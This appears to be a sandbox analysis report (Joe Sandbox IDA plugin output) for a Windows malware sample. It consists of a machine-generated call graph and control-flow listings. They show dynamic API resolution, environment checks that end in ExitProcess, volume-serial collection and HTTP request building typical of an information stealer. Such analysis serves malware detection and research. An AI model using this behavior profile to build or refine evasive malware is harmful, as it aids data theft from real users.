26384 ff3fd4 26383->26384 26385 ff4a60 2 API calls 26384->26385 26386 ff3fea 26385->26386 26387 ff4a60 2 API calls 26386->26387 26388 ff4003 26387->26388 26389 ff4a60 2 API calls 26388->26389 26390 ff4019 26389->26390 26391 ff4a60 2 API calls 26390->26391 26392 ff402f 26391->26392 26393 ff4a60 2 API calls 26392->26393 26394 ff4045 26393->26394 26395 ff4a60 2 API calls 26394->26395 26396 ff405b 26395->26396 26397 ff4a60 2 API calls 26396->26397 26398 ff4071 26397->26398 26399 ff4a60 2 API calls 26398->26399 26400 ff408a 26399->26400 26401 ff4a60 2 API calls 26400->26401 26402 ff40a0 26401->26402 26403 ff4a60 2 API calls 26402->26403 26404 ff40b6 26403->26404 26405 ff4a60 2 API calls 26404->26405 26406 ff40cc 26405->26406 26407 ff4a60 2 API calls 26406->26407 26408 ff40e2 26407->26408 26409 ff4a60 2 API calls 26408->26409 26410 ff40f8 26409->26410 26411 ff4a60 2 API calls 26410->26411 26412 ff4111 26411->26412 26413 ff4a60 2 API calls 26412->26413 26414 ff4127 26413->26414 26415 ff4a60 2 API calls 26414->26415 26416 ff413d 26415->26416 26417 ff4a60 2 API calls 26416->26417 26418 ff4153 26417->26418 26419 ff4a60 2 API calls 26418->26419 26420 ff4169 26419->26420 26421 ff4a60 2 API calls 26420->26421 26422 ff417f 26421->26422 26423 ff4a60 2 API calls 26422->26423 26424 ff4198 26423->26424 26425 ff4a60 2 API calls 26424->26425 26426 ff41ae 26425->26426 26427 ff4a60 2 API calls 26426->26427 26428 ff41c4 26427->26428 26429 ff4a60 2 API calls 26428->26429 26430 ff41da 26429->26430 26431 ff4a60 2 API calls 26430->26431 26432 ff41f0 26431->26432 26433 ff4a60 2 API calls 26432->26433 26434 ff4206 26433->26434 26435 ff4a60 2 API calls 26434->26435 26436 ff421f 26435->26436 26437 ff4a60 2 API calls 26436->26437 26438 ff4235 26437->26438 26439 ff4a60 2 API calls 26438->26439 26440 ff424b 26439->26440 26441 ff4a60 2 API calls 26440->26441 26442 ff4261 26441->26442 26443 ff4a60 2 API calls 26442->26443 26444 ff4277 26443->26444 26445 ff4a60 2 API calls 26444->26445 26446 ff428d 26445->26446 26447 ff4a60 2 API calls 26446->26447 26448 ff42a6 26447->26448 26449 ff4a60 2 API calls 26448->26449 26450 ff42bc 26449->26450 26451 ff4a60 2 API calls 26450->26451 26452 ff42d2 26451->26452 26453 ff4a60 2 API calls 26452->26453 26454 ff42e8 26453->26454 26455 ff4a60 2 API calls 26454->26455 26456 ff42fe 26455->26456 26457 ff4a60 2 API calls 26456->26457 26458 ff4314 26457->26458 26459 ff4a60 2 API calls 26458->26459 26460 ff432d 26459->26460 26461 ff4a60 2 API calls 26460->26461 26462 ff4343 26461->26462 26463 ff4a60 2 API calls 26462->26463 26464 ff4359 26463->26464 26465 ff4a60 2 API calls 26464->26465 26466 ff436f 26465->26466 26467 ff4a60 2 API calls 26466->26467 26468 ff4385 26467->26468 26469 ff4a60 2 API calls 26468->26469 26470 ff439b 26469->26470 26471 ff4a60 2 API calls 26470->26471 26472 ff43b4 26471->26472 26473 ff4a60 2 API calls 26472->26473 26474 ff43ca 26473->26474 26475 ff4a60 2 API calls 26474->26475 26476 ff43e0 26475->26476 26477 ff4a60 2 API calls 26476->26477 26478 ff43f6 26477->26478 26479 ff4a60 2 API calls 26478->26479 26480 ff440c 26479->26480 26481 ff4a60 2 API calls 26480->26481 26482 ff4422 26481->26482 26483 ff4a60 2 API calls 26482->26483 26484 ff443b 26483->26484 26485 ff4a60 2 API calls 26484->26485 26486 ff4451 26485->26486 26487 ff4a60 2 API calls 26486->26487 26488 ff4467 26487->26488 26489 ff4a60 2 API calls 26488->26489 26490 ff447d 26489->26490 26491 ff4a60 2 API calls 26490->26491 26492 ff4493 26491->26492 26493 ff4a60 2 API calls 26492->26493 26494 ff44a9 26493->26494 26495 ff4a60 2 API calls 26494->26495 26496 ff44c2 26495->26496 26497 ff4a60 2 API calls 26496->26497 26498 ff44d8 26497->26498 26499 ff4a60 2 API calls 26498->26499 26500 ff44ee 26499->26500 26501 ff4a60 2 API calls 26500->26501 26502 ff4504 26501->26502 26503 ff4a60 2 API calls 26502->26503 26504 ff451a 26503->26504 26505 ff4a60 2 API calls 26504->26505 26506 ff4530 26505->26506 26507 ff4a60 2 API calls 26506->26507 26508 ff4549 26507->26508 26509 ff4a60 2 API calls 26508->26509 26510 ff455f 26509->26510 26511 ff4a60 2 API calls 26510->26511 26512 ff4575 26511->26512 26513 ff4a60 2 API calls 26512->26513 26514 ff458b 26513->26514 26515 ff4a60 2 API calls 26514->26515 26516 ff45a1 26515->26516 26517 ff4a60 2 API calls 26516->26517 26518 ff45b7 26517->26518 26519 ff4a60 2 API calls 26518->26519 26520 ff45d0 26519->26520 26521 ff4a60 2 API calls 26520->26521 26522 ff45e6 26521->26522 26523 ff4a60 2 API calls 26522->26523 26524 ff45fc 26523->26524 26525 ff4a60 2 API calls 26524->26525 26526 ff4612 26525->26526 26527 ff4a60 2 API calls 26526->26527 26528 ff4628 26527->26528 26529 ff4a60 2 API calls 26528->26529 26530 ff463e 26529->26530 26531 ff4a60 2 API calls 26530->26531 26532 ff4657 26531->26532 26533 ff4a60 2 API calls 26532->26533 26534 ff466d 26533->26534 26535 ff4a60 2 API calls 26534->26535 26536 ff4683 26535->26536 26537 ff4a60 2 API calls 26536->26537 26538 ff4699 26537->26538 26539 ff4a60 2 API calls 26538->26539 26540 ff46af 26539->26540 26541 ff4a60 2 API calls 26540->26541 26542 ff46c5 26541->26542 26543 ff4a60 2 API calls 26542->26543 26544 ff46de 26543->26544 26545 ff4a60 2 API calls 26544->26545 26546 ff46f4 26545->26546 26547 ff4a60 2 API calls 26546->26547 26548 ff470a 26547->26548 26549 ff4a60 2 API calls 26548->26549 26550 ff4720 26549->26550 26551 ff4a60 2 API calls 26550->26551 26552 ff4736 26551->26552 26553 ff4a60 2 API calls 26552->26553 26554 ff474c 26553->26554 26555 ff4a60 2 API calls 26554->26555 26556 ff4765 26555->26556 26557 ff4a60 2 API calls 26556->26557 26558 ff477b 26557->26558 26559 ff4a60 2 API calls 26558->26559 26560 ff4791 26559->26560 26561 ff4a60 2 API calls 26560->26561 26562 ff47a7 26561->26562 26563 ff4a60 2 API calls 26562->26563 26564 ff47bd 26563->26564 26565 ff4a60 2 API calls 26564->26565 26566 ff47d3 26565->26566 26567 ff4a60 2 API calls 26566->26567 26568 ff47ec 26567->26568 26569 ff4a60 2 API calls 26568->26569 26570 ff4802 26569->26570 26571 ff4a60 2 API calls 26570->26571 26572 ff4818 26571->26572 26573 ff4a60 2 API calls 26572->26573 26574 ff482e 26573->26574 26575 ff4a60 2 API calls 26574->26575 26576 ff4844 26575->26576 26577 ff4a60 2 API calls 26576->26577 26578 ff485a 26577->26578 26579 ff4a60 2 API calls 26578->26579 26580 ff4873 26579->26580 26581 ff4a60 2 API calls 26580->26581 26582 ff4889 26581->26582 26583 ff4a60 2 API calls 26582->26583 26584 ff489f 26583->26584 26585 ff4a60 2 API calls 26584->26585 26586 ff48b5 26585->26586 26587 ff4a60 2 API calls 26586->26587 26588 ff48cb 26587->26588 26589 ff4a60 2 API calls 26588->26589 26590 ff48e1 26589->26590 26591 ff4a60 2 API calls 26590->26591 26592 ff48fa 26591->26592 26593 ff4a60 2 API calls 26592->26593 26594 ff4910 26593->26594 26595 ff4a60 2 API calls 26594->26595 26596 ff4926 26595->26596 26597 ff4a60 2 API calls 26596->26597 26598 ff493c 26597->26598 26599 ff4a60 2 API calls 26598->26599 26600 ff4952 26599->26600 26601 ff4a60 2 API calls 26600->26601 26602 ff4968 26601->26602 26603 ff4a60 2 API calls 26602->26603 26604 ff4981 26603->26604 26605 ff4a60 2 API calls 26604->26605 26606 ff4997 26605->26606 26607 ff4a60 2 API calls 26606->26607 26608 ff49ad 26607->26608 26609 ff4a60 2 API calls 26608->26609 26610 ff49c3 26609->26610 26611 ff4a60 2 API calls 26610->26611 26612 ff49d9 26611->26612 26613 ff4a60 2 API calls 26612->26613 26614 ff49ef 26613->26614 26615 ff4a60 2 API calls 26614->26615 26616 ff4a08 26615->26616 26617 ff4a60 2 API calls 26616->26617 26618 ff4a1e 26617->26618 26619 ff4a60 2 API calls 26618->26619 26620 ff4a34 26619->26620 26621 ff4a60 2 API calls 26620->26621 26622 ff4a4a 26621->26622 26623 10166e0 26622->26623 26624 10166ed 43 API calls 26623->26624 26625 1016afe 8 API calls 26623->26625 26624->26625 26626 1016b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26625->26626 26627 1016c08 26625->26627 26626->26627 26628 1016cd2 26627->26628 26629 1016c15 8 API calls 26627->26629 26630 1016cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26628->26630 26631 1016d4f 26628->26631 26629->26628 26630->26631 26632 1016de9 26631->26632 26633 1016d5c 6 API calls 26631->26633 26634 1016f10 26632->26634 26635 1016df6 12 API calls 26632->26635 26633->26632 26636 1016f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26634->26636 26637 1016f8d 26634->26637 26635->26634 26636->26637 26638 1016fc1 26637->26638 26639 1016f96 GetProcAddress GetProcAddress 26637->26639 26640 1016ff5 26638->26640 26641 1016fca GetProcAddress GetProcAddress 26638->26641 26639->26638 26642 1017002 10 API calls 26640->26642 26643 10170ed 26640->26643 26641->26640 26642->26643 26644 1017152 26643->26644 26645 10170f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26643->26645 26646 101715b GetProcAddress 26644->26646 26647 101716e 26644->26647 26645->26644 26646->26647 26648 101051f 26647->26648 26649 1017177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26647->26649 26650 ff1530 26648->26650 26649->26648 26959 ff1610 26650->26959 26652 ff153b 26653 ff1555 lstrcpy 26652->26653 26654 ff155d 26652->26654 26653->26654 26655 ff1577 lstrcpy 26654->26655 26656 ff157f 26654->26656 26655->26656 26657 ff1599 lstrcpy 26656->26657 26658 ff15a1 26656->26658 26657->26658 26659 ff1605 26658->26659 26660 ff15fd lstrcpy 26658->26660 26661 100f1b0 lstrlen 26659->26661 26660->26659 26662 100f1e4 26661->26662 26663 100f1f7 lstrlen 26662->26663 26664 100f1eb lstrcpy 26662->26664 26665 100f208 26663->26665 26664->26663 26666 100f21b lstrlen 26665->26666 26667 100f20f lstrcpy 26665->26667 26668 100f22c 26666->26668 26667->26666 26669 100f233 lstrcpy 26668->26669 26670 100f23f 26668->26670 26669->26670 26671 100f258 lstrcpy 26670->26671 26672 100f264 26670->26672 26671->26672 26673 100f286 lstrcpy 26672->26673 26674 100f292 26672->26674 26673->26674 26675 100f2ba lstrcpy 26674->26675 26676 100f2c6 26674->26676 26675->26676 26677 100f2ea lstrcpy 26676->26677 26720 100f300 26676->26720 26677->26720 26678 100f30c lstrlen 26678->26720 26679 100f4b9 lstrcpy 26679->26720 26680 100f3a1 lstrcpy 26680->26720 26681 100f3c5 lstrcpy 26681->26720 26682 100f4e8 lstrcpy 26743 100f4f0 26682->26743 26683 ff1530 8 API calls 26683->26743 26684 100f479 lstrcpy 26684->26720 26685 100f59c lstrcpy 26685->26743 26686 100f70f StrCmpCA 26691 100fe8e 26686->26691 26686->26720 26687 100f616 StrCmpCA 26687->26686 26687->26743 26688 100fa29 StrCmpCA 26698 100fe2b 26688->26698 26688->26720 26689 100f73e lstrlen 26689->26720 26690 100fd4d StrCmpCA 26694 100fd60 Sleep 26690->26694 26704 100fd75 26690->26704 26692 100fead lstrlen 26691->26692 26696 100fea5 lstrcpy 26691->26696 26699 100fec7 26692->26699 26693 100fa58 lstrlen 26693->26720 26694->26720 26695 100f64a lstrcpy 26695->26743 26696->26692 26697 100fe4a lstrlen 26706 100fe64 26697->26706 26698->26697 26700 100fe42 lstrcpy 26698->26700 26707 100fee7 lstrlen 26699->26707 26710 100fedf lstrcpy 26699->26710 26700->26697 26701 100ee90 28 API calls 26701->26743 26702 100f89e lstrcpy 26702->26720 26703 100fd94 lstrlen 26719 100fdae 26703->26719 26704->26703 26708 100fd8c lstrcpy 26704->26708 26705 100f76f lstrcpy 26705->26720 26713 100fdce lstrlen 26706->26713 26714 100fe7c lstrcpy 26706->26714 26711 100ff01 26707->26711 26708->26703 26709 100fbb8 lstrcpy 26709->26720 26710->26707 26718 100ff21 26711->26718 26721 100ff19 lstrcpy 26711->26721 26712 100fa89 lstrcpy 26712->26720 26729 100fde8 26713->26729 26714->26713 26715 100f791 lstrcpy 26715->26720 26717 100f8cd lstrcpy 26717->26743 26722 ff1610 4 API calls 26718->26722 26719->26713 26725 100fdc6 lstrcpy 26719->26725 26720->26678 26720->26679 26720->26680 26720->26681 26720->26682 26720->26684 26720->26686 26720->26688 26720->26689 26720->26690 26720->26693 26720->26702 26720->26705 26720->26709 26720->26712 26720->26715 26720->26717 26723 100faab lstrcpy 26720->26723 26726 ff1530 8 API calls 26720->26726 26727 100ee90 28 API calls 26720->26727 26728 100fbe7 lstrcpy 26720->26728 26734 100f7e2 lstrcpy 26720->26734 26737 100fafc lstrcpy 26720->26737 26720->26743 26721->26718 26745 100fe13 26722->26745 26723->26720 26724 100f698 lstrcpy 26724->26743 26725->26713 26726->26720 26727->26720 26728->26743 26730 100fe08 26729->26730 26732 100fe00 lstrcpy 26729->26732 26733 ff1610 4 API calls 26730->26733 26731 100efb0 35 API calls 26731->26743 26732->26730 26733->26745 26734->26720 26735 100f99e StrCmpCA 26735->26688 26735->26743 26736 100f924 lstrcpy 26736->26743 26737->26720 26738 100fc3e lstrcpy 26738->26743 26739 100fcb8 StrCmpCA 26739->26690 26739->26743 26740 100f9cb lstrcpy 26740->26743 26741 100fce9 lstrcpy 26741->26743 26742 100fa19 lstrcpy 26742->26743 26743->26683 26743->26685 26743->26687 26743->26688 26743->26690 26743->26695 26743->26701 26743->26720 26743->26724 26743->26731 26743->26735 26743->26736 26743->26738 26743->26739 26743->26740 26743->26741 26743->26742 26744 100fd3a lstrcpy 26743->26744 26744->26743 26745->25769 26747 1012785 26746->26747 26748 101278c GetVolumeInformationA 26746->26748 26747->26748 26749 10127ec GetProcessHeap RtlAllocateHeap 26748->26749 26751 1012826 wsprintfA 26749->26751 26752 1012822 26749->26752 26751->26752 26969 10171e0 26752->26969 26756 ff4c70 26755->26756 26757 ff4c85 26756->26757 26758 ff4c7d lstrcpy 26756->26758 26973 ff4bc0 26757->26973 26758->26757 26760 ff4c90 26761 ff4ccc lstrcpy 26760->26761 26762 ff4cd8 26760->26762 26761->26762 26763 ff4cff lstrcpy 26762->26763 26764 ff4d0b 26762->26764 26763->26764 26765 ff4d2f lstrcpy 26764->26765 26766 ff4d3b 26764->26766 26765->26766 26767 ff4d6d lstrcpy 26766->26767 26768 ff4d79 26766->26768 26767->26768 26769 ff4dac InternetOpenA StrCmpCA 26768->26769 26770 ff4da0 lstrcpy 26768->26770 26771 ff4de0 26769->26771 26770->26769 26772 ff4def 26771->26772 26773 ff54b8 InternetCloseHandle CryptStringToBinaryA 26771->26773 26977 1013e70 lstrcpy lstrcpy GetSystemTime 26772->26977 26774 ff54e8 LocalAlloc 26773->26774 26791 ff55d8 26773->26791 26776 ff54ff CryptStringToBinaryA 26774->26776 26774->26791 26777 ff5529 lstrlen 26776->26777 26778 ff5517 LocalFree 26776->26778 26780 ff553d 26777->26780 26778->26791 26779 ff4dfa 26783 ff4e23 lstrcpy lstrcat 26779->26783 26784 ff4e38 26779->26784 26781 ff5557 lstrcpy 26780->26781 26782 ff5563 lstrlen 26780->26782 26781->26782 26786 ff557d 26782->26786 26783->26784 26785 ff4e5a lstrcpy 26784->26785 26788 ff4e62 26784->26788 26785->26788 26787 ff558f lstrcpy lstrcat 26786->26787 26789 ff55a2 26786->26789 26787->26789 26790 ff4e71 lstrlen 26788->26790 26793 ff55d1 26789->26793 26794 ff55c9 lstrcpy 26789->26794 26792 ff4e89 26790->26792 26791->25798 26795 ff4e95 lstrcpy lstrcat 26792->26795 26796 ff4eac 26792->26796 26793->26791 26794->26793 26795->26796 26797 ff4ed5 26796->26797 26798 ff4ecd lstrcpy 26796->26798 26799 ff4edc lstrlen 26797->26799 26798->26797 26800 ff4ef2 26799->26800 26801 ff4efe lstrcpy lstrcat 26800->26801 26802 ff4f15 26800->26802 26801->26802 26803 ff4f36 lstrcpy 26802->26803 26804 ff4f3e 26802->26804 26803->26804 26805 ff4f65 lstrcpy lstrcat 26804->26805 26806 ff4f7b 26804->26806 26805->26806 26807 ff4fa4 26806->26807 26808 ff4f9c lstrcpy 26806->26808 26809 ff4fab lstrlen 26807->26809 26808->26807 26810 ff4fc1 26809->26810 26811 ff4fcd lstrcpy lstrcat 26810->26811 26812 ff4fe4 26810->26812 26811->26812 26813 ff500d 26812->26813 26814 ff5005 lstrcpy 26812->26814 26815 ff5014 lstrlen 26813->26815 26814->26813 26816 ff502a 26815->26816 26817 ff5036 lstrcpy lstrcat 26816->26817 26818 ff504d 26816->26818 26817->26818 26819 ff5079 26818->26819 26820 ff5071 lstrcpy 26818->26820 26821 ff5080 lstrlen 26819->26821 26820->26819 26822 ff509b 26821->26822 26823 ff50ac lstrcpy lstrcat 26822->26823 26824 ff50bc 26822->26824 26823->26824 26825 ff50da lstrcpy lstrcat 26824->26825 26826 ff50ed 26824->26826 26825->26826 26827 ff510b lstrcpy 26826->26827 26828 ff5113 26826->26828 26827->26828 26829 ff5121 InternetConnectA 26828->26829 26829->26773 26830 ff5150 HttpOpenRequestA 26829->26830 26831 ff518b 26830->26831 26832 ff54b1 InternetCloseHandle 26830->26832 26978 1017310 lstrlen lstrcpy lstrcat 26831->26978 26832->26773 26834 ff519b 26979 1017280 lstrcpy 26834->26979 26836 ff51a4 26980 10172c0 lstrcpy lstrcat 26836->26980 26838 ff51b7 26981 1017280 lstrcpy 26838->26981 26840 ff51c0 26982 1017310 lstrlen lstrcpy lstrcat 26840->26982 26842 ff51d5 26983 1017280 lstrcpy 26842->26983 26844 ff51de 26984 1017310 lstrlen lstrcpy lstrcat 26844->26984 26846 ff51f4 26985 1017280 lstrcpy 26846->26985 26848 ff51fd 26986 1017310 lstrlen lstrcpy lstrcat 26848->26986 26850 ff5213 26987 1017280 lstrcpy 26850->26987 26852 ff521c 26988 1017310 lstrlen lstrcpy lstrcat 26852->26988 26854 ff5231 26989 1017280 lstrcpy 26854->26989 26856 ff523a 26990 10172c0 lstrcpy lstrcat 26856->26990 26858 ff524d 26991 1017280 lstrcpy 26858->26991 26860 ff5256 26992 1017310 lstrlen lstrcpy lstrcat 26860->26992 26862 ff526b 26993 1017280 lstrcpy 26862->26993 26864 ff5274 26994 1017310 lstrlen lstrcpy lstrcat 26864->26994 26866 ff5289 26995 1017280 lstrcpy 26866->26995 26868 ff5292 26996 10172c0 lstrcpy lstrcat 26868->26996 26870 ff52a5 26997 1017280 lstrcpy 26870->26997 26872 ff52ae 26998 1017310 lstrlen lstrcpy lstrcat 26872->26998 26874 ff52c3 26999 1017280 lstrcpy 26874->26999 26876 ff52cc 27000 1017310 lstrlen lstrcpy lstrcat 26876->27000 26878 ff52e2 27001 1017280 lstrcpy 26878->27001 26880 ff52eb 27002 1017310 lstrlen lstrcpy lstrcat 26880->27002 26882 ff5301 27003 1017280 lstrcpy 26882->27003 26884 ff530a 27004 1017310 lstrlen lstrcpy lstrcat 26884->27004 26886 ff531f 27005 1017280 lstrcpy 26886->27005 26888 ff5328 27006 10172c0 lstrcpy lstrcat 26888->27006 26890 ff533b 27007 1017280 lstrcpy 26890->27007 26892 ff5344 26893 ff537c 26892->26893 26894 ff5370 lstrcpy 26892->26894 27008 10172c0 lstrcpy lstrcat 26893->27008 26894->26893 26896 ff538a 27009 10172c0 lstrcpy lstrcat 26896->27009 26898 ff5397 27010 1017280 lstrcpy 26898->27010 26900 ff53a1 26901 ff53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 26900->26901 26902 ff549c InternetCloseHandle 26901->26902 26906 ff53f2 26901->26906 26904 ff54ae 26902->26904 26903 ff53fd lstrlen 26903->26906 26904->26832 26905 ff542e lstrcpy lstrcat 26905->26906 26906->26902 26906->26903 26906->26905 26907 ff546b lstrcpy 26906->26907 26908 ff547a InternetReadFile 26906->26908 26907->26906 26908->26902 26908->26906 26910 1008cc6 ExitProcess 26909->26910 26925 1008ccd 26909->26925 26911 1008ee2 26911->25800 26912 1008d84 StrCmpCA 26912->26925 26913 1008da4 StrCmpCA 26913->26925 26914 1008d06 lstrlen 26914->26925 26915 1008e88 lstrlen 26915->26925 26916 1008e6f StrCmpCA 26916->26925 26917 1008d30 lstrlen 26917->26925 26918 1008e56 StrCmpCA 26918->26925 26919 1008d5a lstrlen 26919->26925 26920 1008dbd StrCmpCA 26920->26925 26921 1008ddd StrCmpCA 26921->26925 26922 1008dfd StrCmpCA 26922->26925 26923 1008e1d StrCmpCA 26923->26925 26924 1008e3d StrCmpCA 26924->26925 26925->26911 26925->26912 26925->26913 26925->26914 26925->26915 26925->26916 26925->26917 26925->26918 26925->26919 26925->26920 26925->26921 26925->26922 26925->26923 26925->26924 26926 1008ebb lstrcpy 26925->26926 26926->26925 26927->25806 26928->25808 26929->25814 26930->25816 26931->25822 26932->25824 26933->25830 26934->25834 26935->25840 26936->25842 26937->25846 26938->25860 26939->25864 26940->25863 26941->25859 26942->25863 26943->25882 26944->25866 26945->25867 26946->25871 26947->25877 26948->25879 26949->25885 26950->25888 26951->25895 26952->25917 26953->25921 26954->25920 26955->25916 26956->25920 26957->25930 26960 ff161f 26959->26960 26961 ff162b lstrcpy 26960->26961 26962 ff1633 26960->26962 26961->26962 26963 ff164d lstrcpy 26962->26963 26964 ff1655 26962->26964 26963->26964 26965 ff166f lstrcpy 26964->26965 26966 ff1677 26964->26966 26965->26966 26967 ff1699 26966->26967 26968 ff1691 lstrcpy 26966->26968 26967->26652 26968->26967 26970 10171e6 26969->26970 26971 1012860 26970->26971 26972 10171fc lstrcpy 26970->26972 26971->25795 26972->26971 26974 ff4bd0 26973->26974 26974->26974 26975 ff4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26974->26975 26976 ff4c41 26975->26976 26976->26760 26977->26779 26978->26834 26979->26836 26980->26838 26981->26840 26982->26842 26983->26844 26984->26846 26985->26848 26986->26850 26987->26852 26988->26854 26989->26856 26990->26858 26991->26860 26992->26862 26993->26864 26994->26866 26995->26868 26996->26870 26997->26872 26998->26874 26999->26876 27000->26878 27001->26880 27002->26882 27003->26884 27004->26886 27005->26888 27006->26890 27007->26892 27008->26896 27009->26898 27010->26900

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1786 1016390-10163bd GetPEB 1787 10165c3-1016623 LoadLibraryA * 5 1786->1787 1788 10163c3-10165be call 10162f0 GetProcAddress * 20 1786->1788 1790 1016625-1016633 GetProcAddress 1787->1790 1791 1016638-101663f 1787->1791 1788->1787 1790->1791 1792 1016641-1016667 GetProcAddress * 2 1791->1792 1793 101666c-1016673 1791->1793 1792->1793 1795 1016675-1016683 GetProcAddress 1793->1795 1796 1016688-101668f 1793->1796 1795->1796 1797 1016691-101669f GetProcAddress 1796->1797 1798 10166a4-10166ab 1796->1798 1797->1798 1800 10166d7-10166da 1798->1800 1801 10166ad-10166d2 GetProcAddress * 2 1798->1801 1801->1800
                                APIs
                                • GetProcAddress.KERNEL32(77190000,00D616C0), ref: 010163E9
                                • GetProcAddress.KERNEL32(77190000,00D616F0), ref: 01016402
                                • GetProcAddress.KERNEL32(77190000,00D61480), ref: 0101641A
                                • GetProcAddress.KERNEL32(77190000,00D61498), ref: 01016432
                                • GetProcAddress.KERNEL32(77190000,00D68B80), ref: 0101644B
                                • GetProcAddress.KERNEL32(77190000,00D56118), ref: 01016463
                                • GetProcAddress.KERNEL32(77190000,00D56218), ref: 0101647B
                                • GetProcAddress.KERNEL32(77190000,00D614B0), ref: 01016494
                                • GetProcAddress.KERNEL32(77190000,00D614F8), ref: 010164AC
                                • GetProcAddress.KERNEL32(77190000,00D61510), ref: 010164C4
                                • GetProcAddress.KERNEL32(77190000,00D61528), ref: 010164DD
                                • GetProcAddress.KERNEL32(77190000,00D56138), ref: 010164F5
                                • GetProcAddress.KERNEL32(77190000,00D61540), ref: 0101650D
                                • GetProcAddress.KERNEL32(77190000,00D61558), ref: 01016526
                                • GetProcAddress.KERNEL32(77190000,00D560B8), ref: 0101653E
                                • GetProcAddress.KERNEL32(77190000,00D61570), ref: 01016556
                                • GetProcAddress.KERNEL32(77190000,00D615D0), ref: 0101656F
                                • GetProcAddress.KERNEL32(77190000,00D56298), ref: 01016587
                                • GetProcAddress.KERNEL32(77190000,00D61750), ref: 0101659F
                                • GetProcAddress.KERNEL32(77190000,00D562D8), ref: 010165B8
                                • LoadLibraryA.KERNEL32(00D61768,?,?,?,01011C03), ref: 010165C9
                                • LoadLibraryA.KERNEL32(00D617E0,?,?,?,01011C03), ref: 010165DB
                                • LoadLibraryA.KERNEL32(00D617F8,?,?,?,01011C03), ref: 010165ED
                                • LoadLibraryA.KERNEL32(00D61780,?,?,?,01011C03), ref: 010165FE
                                • LoadLibraryA.KERNEL32(00D61798,?,?,?,01011C03), ref: 01016610
                                • GetProcAddress.KERNEL32(76850000,00D617C8), ref: 0101662D
                                • GetProcAddress.KERNEL32(77040000,00D617B0), ref: 01016649
                                • GetProcAddress.KERNEL32(77040000,00D61810), ref: 01016661
                                • GetProcAddress.KERNEL32(75A10000,00D68EB8), ref: 0101667D
                                • GetProcAddress.KERNEL32(75690000,00D563B8), ref: 01016699
                                • GetProcAddress.KERNEL32(776F0000,00D68A80), ref: 010166B5
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 010166CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 010166C1
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: da128f87a62da878c00e82e056e6efcb2e13064c38d0fbf1888c8751b4d64234
                                • Instruction ID: 9818fc884441093b48008e8c487773de1389060a47a78675677cda1da5281414
                                • Opcode Fuzzy Hash: da128f87a62da878c00e82e056e6efcb2e13064c38d0fbf1888c8751b4d64234
                                • Instruction Fuzzy Hash: 35A150B5A11224BFDB74DF64F84CE2E37F9B788648B00A519E9559331CD778AA80CF60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1802 1011bf0-1011c0b call ff2a90 call 1016390 1807 1011c1a-1011c27 call ff2930 1802->1807 1808 1011c0d 1802->1808 1812 1011c35-1011c63 1807->1812 1813 1011c29-1011c2f lstrcpy 1807->1813 1809 1011c10-1011c18 1808->1809 1809->1807 1809->1809 1817 1011c65-1011c67 ExitProcess 1812->1817 1818 1011c6d-1011c7b GetSystemInfo 1812->1818 1813->1812 1819 1011c85-1011ca0 call ff1030 call ff10c0 GetUserDefaultLangID 1818->1819 1820 1011c7d-1011c7f ExitProcess 1818->1820 1825 1011ca2-1011ca9 1819->1825 1826 1011cb8-1011cca call 1012ad0 call 1013e10 1819->1826 1825->1826 1827 1011cb0-1011cb2 ExitProcess 1825->1827 1832 1011ce7-1011d06 lstrlen call ff2930 1826->1832 1833 1011ccc-1011cde call 1012a40 call 1013e10 1826->1833 1839 1011d23-1011d40 lstrlen call ff2930 1832->1839 1840 1011d08-1011d0d 1832->1840 1833->1832 1844 1011ce0-1011ce1 ExitProcess 1833->1844 1847 1011d42-1011d44 1839->1847 1848 1011d5a-1011d7b call 1012ad0 lstrlen call ff2930 1839->1848 1840->1839 1842 1011d0f-1011d11 1840->1842 1842->1839 1845 1011d13-1011d1d lstrcpy lstrcat 1842->1845 1845->1839 1847->1848 1850 